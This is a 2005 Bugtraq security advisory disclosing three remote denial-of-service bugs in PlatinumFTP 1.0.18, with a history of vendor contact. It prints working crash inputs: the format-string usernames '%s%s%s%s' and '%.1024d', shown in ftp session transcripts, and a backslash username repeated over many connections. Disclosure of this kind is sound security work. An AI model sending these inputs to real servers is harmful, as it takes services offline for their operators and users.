PlatinumFTP 1.0.18 remote DoS

From: ports (ml_at_portsonline.net)
Date: 03/12/05

  • Next message: SecurityReason: "[SECURITYREASON.COM] Mass Full Path Disclosure in paFileDB"
    Date: Sat, 12 Mar 2005 17:04:31 +0100
    To: bugtraq@securityfocus.com
    
    

    Application: PlantinumFTP
    Site: http://www.roboshareware.com/indexplatinumftp.php
    Version: 1.0.18 and maybe lower
    OS: Windows
    Bug: Remote Denial of Service

    =====
    Product:
    PlatinumFTPserver simplifies management of all your Ftp clients with
    regards to sending and receiving program and data files over an IP
    connection.

    =====
    About:
    I didn't found any informations about the Bugs I've found and the
    vendor doesn't seem to be interested in fixing problems (see History).
    Since PlatinumFTP isn't a mainstream server I decided to make this
    Disclosure.

    Well, I found 3 different ways do shut down (denial of service) a
    PlatinumFTP 1.0.18 server. At least you doesn't need a valid user

    =====
    First Bug:
    You can stop the server using %s%s%s%s as username.

    -------------------- schnipp --------------------
    ports@boom:~$ ftp 192.168.10.101
    Connected to 192.168.10.101.
    220-PlatinumFTPserver V1.0.18
    220 Enter login details
    Name (192.168.10.101:ports): %s%s%s%s
    421 Service not available, remote server has closed connection
    Login failed.
    No control connection for command: Transport endpoint is not connected
    ftp>
    -------------------- schnapp --------------------

    =====
    Second Bug:
    You can stop the server using %.1024d as username.

    -------------------- schnipp --------------------
    ports@boom:~$ ftp 192.168.10.101
    Connected to 192.168.10.101.
    220-PlatinumFTPserver V1.0.18
    220 Enter login details
    Name (192.168.10.101:ports): %.1024d
    331 Password required for 000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    00000000000000000000000000000000000000000000000000000000000000000000000
    000000000000000000000000000000421 Service not available, remote server
    has closed connection
    Login failed.
    No control connection for command: Transport endpoint is not connected
    ftp>
    -------------------- schnapp --------------------

    =====
    Third Bug:
    Well, shuting down a server using the third bug is, compared to the
    first Bugs, really tricky *cough*. If you put in a \ as username the
    Server will show a requester on his console saying 'Incorrect Format:
    HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'.
    The ftp login process for the current session will stop until someone
    affirmed this message.

    I wrote a little perl script to see if it's possible to shut the server
    down and it's working. You just have to connect a couple of times using
    the username \ and after a few connections (>50) the server will crash.

    Since most of you guys know how to write a script like that I doens't
    attach it :) Of course you can find them later on my homepage.

    =====
    History:
    2005-03-05: Found the Bugs and mailed the vendor
    2005-03-07: Mailed the vendor again using all mailaddresse I found
    2005-03-10: Created a yahoo-account *sigh* to make a forum post
    2005-03-12: Still no response...

    Well, now let's count the hours/days until someone is telling me I'm a
    fool because I didn't made a working exploit out of it.

    ports


  • Next message: SecurityReason: "[SECURITYREASON.COM] Mass Full Path Disclosure in paFileDB"